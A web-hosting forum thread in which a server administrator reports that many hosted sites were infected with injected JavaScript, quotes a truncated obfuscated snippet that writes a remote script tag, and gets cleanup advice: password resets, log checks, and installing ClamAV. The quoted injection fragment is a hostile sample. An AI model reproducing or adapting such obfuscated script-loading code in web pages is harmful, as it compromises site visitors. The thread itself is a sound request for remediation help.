Results 1 to 6 of 6

Thread: Infected index.xxx files on my server

  1. #1
    Registered Member
    Join Date
    May 2006
    Location
    Perú
    Posts
    38

    Default Infected index.xxx files on my server

    Hi i have many sites of my server with Redhat ES 3 and cPanel 11.24.5-S38506 - WHM 11.24.2 - X 3.9

    Many sites, have a code like:
    <script>/*Exception*/ document.write('<script src='+'h@$(@t!t^p!&:#^@/^!)^/!p^l#!@a@&$$) ...... \$/ig, '')+' defer=defer></scr'+'ipt>');</script><!--9f5661a0f751133b5d2ccace4a586aaa-->

    It's similar to the gumblar, but this dont create an iframe.

    How could i secure my sites and remove this trojan without remove my site and my databases and other things.

    Thanks in advance!
    Last edited by samuelmf; 01-25-2010 at 02:01 AM.

  2. #2
    Registered Member
    Join Date
    May 2008
    Posts
    1,202

    Default

    You will have to manually remove the malicious script from all your files and reset the password of all your accounts including cpanel, FTP etc. Before doing that check the FTP logs from which IP address the malicious script was uploaded or the file being modified and block the particular IP address in your server.
    AccuWebHosting.Com | cPanel Hosting Provider Since 2003
    Cloud Powered Hosting | cPanel VPS
    Trusted by 20,000+ Clients Worldwide

  3. #3
    Registered Member
    Join Date
    May 2006
    Location
    Perú
    Posts
    38

    Default

    Could i install on my server the Anti-Gumblar script?

  4. #4
    Registered User
    Join Date
    Jan 2010
    Posts
    2

    Smile Anti Gumblar wont help

    Hello,

    Installation of Anti Gumblar wont help that much.

    We would suggest you to download your all pages, related to site content to local machine scan it and and re upload it again. Make sure to change FTP password complex and confidential. And then re upload your all site related content. It would be more helpful to you.

    You can get help from developer to remove the script that infected to main page or respective page.

    Regards,
    Eminds Tech - Kapil

  5. #5
    Registered Member
    Join Date
    May 2006
    Location
    Perú
    Posts
    38

    Default

    Some specific antivirus software to remove the virus locally?

  6. #6
    cPanel Quality Assurance Analyst cPanelDon's Avatar
    Join Date
    Nov 2008
    Location
    Houston, Texas, U.S.A.
    Posts
    2,554
    cPanel Access Level

    DataCenter Provider

    Default

    Quote Originally Posted by samuelmf View Post
    Some specific antivirus software to remove the virus locally?
    For server-side usage I recommend ClamAV; it is free and readily available. For a Linux RPM-based OS like CentOS or RHEL I recommend to first ensure that there are no conflicting ClamAV software packages (RPMs) installed, and then proceed to compile ClamAV from source by installing the ClamAV Connector plug-in via WHM:
    WHM: Main >> cPanel >> Manage Plugins >> clamavconnector

    To check for conflicting ClamAV software packages the following command may be used:
    Code:
    # rpm -qa | grep -i clam
    To remove a conflicting RPM, simply use "rpm -e" followed by the package name.

    Once ClamAV is installed I recommend reviewing usage information in the provided manual "man" documentation using the following command via root SSH access:
    Code:
    # man clamscan
    For home or other non-server use (e.g., if scanning files on a local workstation) I personally prefer Kaspersky Anti-Virus; it is a commercially-licensed (paid) product, but there is a free trial period where the software could be tested to see if it meets your specific needs or requirements.

    Reference web site and vendor forums: Kaspersky Lab & Kaspersky Lab Forum

Similar Threads

  1. DNS cluster error on xxxxxx : Authentication Failed on xxx.xxx.xxx.xxx.
    By alexandz in forum Bind / DNS / Nameserver Issues
    Replies: 1
    Last Post: 01-09-2012, 11:13 AM
  2. Hacked - all index.xxx files changed
    By jeroman8 in forum Security
    Replies: 1
    Last Post: 10-11-2010, 06:51 AM
  3. Replies: 4
    Last Post: 12-01-2008, 01:28 AM
  4. Order Execution of index.XXX files
    By Computerbob in forum General Discussion
    Replies: 9
    Last Post: 02-11-2008, 12:03 PM
  5. Replies: 6
    Last Post: 04-19-2007, 06:39 PM

Tags for this Thread

bargain